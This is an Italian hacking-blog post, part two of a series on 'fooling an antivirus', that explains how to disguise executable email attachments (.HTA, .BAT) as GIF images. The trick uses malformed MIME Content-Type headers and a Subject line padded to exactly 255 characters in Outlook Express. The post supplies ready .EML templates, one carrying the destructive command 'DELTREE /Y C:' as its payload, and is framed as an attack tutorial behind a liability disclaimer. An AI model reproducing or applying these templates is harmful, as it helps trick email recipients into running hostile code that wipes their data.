DISCLAIMER!

Le informazioni (e i download, quindi tutti i file contenuti nel blog) da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio e/o illecito delle tecniche e dei programmi qui descritti e di tutti i danni a cose e persone e/o perdite di guadagni che ne possano derivare. Il blog non vuole istigare nessuno a delinquere o a commettere reati. Le tecniche qui descritte sono da utilizzare a proprio rischio e pericolo.

Traduci Il Blog In




Cerca in Xthreme Hacking!

Fregare un Ativirus [Parte 2]



Eccoci alla seconda parte dell articolo su come fregare un antivirus



IL MIME NELLE E-MAIL
Un secondo modo di realizzare lo spoofing dei tipi di files è invece molto più subdolo e meno facile da intercettare: si tratta dell’uso di intestazioni malformate nel protocollo MIME che gestisce gli allegati alle e-mail. Gli attachment in un messaggio di posta elettronica vengono codificati usando lo standard MIME con una codifica di solo testo nel caso dei file ASCII puri (TXT, BAT, HTA) oppure con la codifica “base64″ nel caso si tratti di file binari (eseguibili, immagini, file ZIP). Ecco un esempio di come vengono codificati (in forma di attachment) un file di immagine (PAMELA.GIF) e un file eseguibile (COMMAND.COM). La sezione evidenziata (box 1) nelle due definizioni di attachment è quella che definisce il tipo di files allegato e quindi anche l’applicazione da eseguire e l’associazione che deve realizzare Windows per quel file. L’inganno consiste proprio nel cambiare il campo “Content-Type” indicando magari che un file eseguibile è un’immagine. Windows (quindi Outlook Express) andrà ad associare a quel file l’icona corrispondente a ciò che indichiamo dentro la definizione MIME, quindi un attachment che magari è un programma porterà l’icona associate ai file GIF. Proviamo allora a creare una e-mail con un allegato “camuffato”: scriviamo un file di testo come quello riportato e salviamolo poi con l’estensione .EML (per renderlo una e-mail leggibile da Outlook);
MIME-Version: 1.0
From: mittente@server.com
To: destinatario@server.com
Subject: bla bla bla
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit

Il file allegato è un’applicazione di tipo HTA, quindi eseguibile, tuttavia se andiamo ad aprire l’e-mail essa riporta un allegato con l’icona di un’immagine GIF proprio perche nel “Content – Type” abbiamo specificato un tipo di file diverso. l’exploit ancora non è ancora completo, perché se ora proviamo ad aprire il file allegato, questo viene associato al visualizzatore di immagini GIF di Windows e non viene più considerato un eseguibile, quindi pur volendo non potrebbe causare alcun danno. Cosa è successo? Cambiando il “Content – Type” abbiamo modificato radicalmente il tipo di file, che ora viene associato ad un’altra applicazione e quindi non è più eseguibile. Come oltrepassare questa limitazione? E’ qui che viene sfruttato un bug del MIME che consiste nel creare un “Subject” dell’e-maillungo 255 caratteri (ne uno di più, ne uno di meno!) seguito dall’estensione che vogliamo dare al file (nel caso di prima quindi “.HTA”). Se mettessimo un solo carattere in meno dei 255 previsti, l’allegato verrebbe riconosciuto come un’immagine GIF; se invece mettessimo un carattere in più l’allegato perderebbe ogni tipo di estensione e non sarebbe riconosciuto da Windows ne associato a qualche applicazione. Ecco quindi come modificare l’e-mail per realizzare il filetype spoofing;
From: mittente@server.com
To: destinatario@server.com
Subject: PAMELA.GIF + [245 spazi vuoti] + .HTA
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit

L’essenziale è inserire nel ” Subject” 255 caratteri ASCll: volendo si può scrivere anche un nome fasullo per il file (PAMELA.GIF) e completare poi i caratteri che mancano con degli spazi vuoti fino ad arrivare a 255 (nel nostro caso quindi servono 245 spazi perché “PAMELA.GIF” è lungo 10 caratteri) e infine scrivere la vera estensione da assegnare al file allegato (.HTA). Il tutto ovviamente va scritto su un’unica riga;
Ecco un altro esempio che utilizza lo spoofing di un file BAT, che virtualmente può eseguire qualsiasi comando sul sistema:
From: mittente@server.com
To: destinatario@server.com
Subject: PAMELA.GIF + [245 spazi vuoti] + .BAT
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
DELTREE /Y C:
Content-Type: image/gif; name=”PAMELA.GIF”
Content-Transfer-Encoding: base64
oaMk7W8HR28u0yAIB2OfcimXz5UmiMuV025P83
…….(parte codificata in base64)
Content-Type: application/actet-stream; name=”COMMAND.COM”
Content-Transfer-Encoding: base64
TVogALsAAAC4BAAA//8AAAAAAAAAA
…….(parte codificata in base64)
ESEMPIO DI CODIFICA DEGLI ALLEGATI
Come ci difende Windows da questi attachment pericolosi? E’ vero che la falla di sicurezza può rendere ingannevoli i files e confondere gli utenti, tuttavia Windows si accorge dell’inghippo e quando l’utente clicca per aprire l’allegato, Outlook mostra un minimo di avviso, anche se però non viene menzionato il fatto che l’allegato non è un’immagine e all’interno dello stesso avviso il file viene nominato col nome fasullo, non con quello reale, proprio per il fatto che sono stati usati 255 caratteri.
Pubblicato da BSOD

Nessun commento:

Posta un commento

Iscriviti a: Commenti sul post (Atom)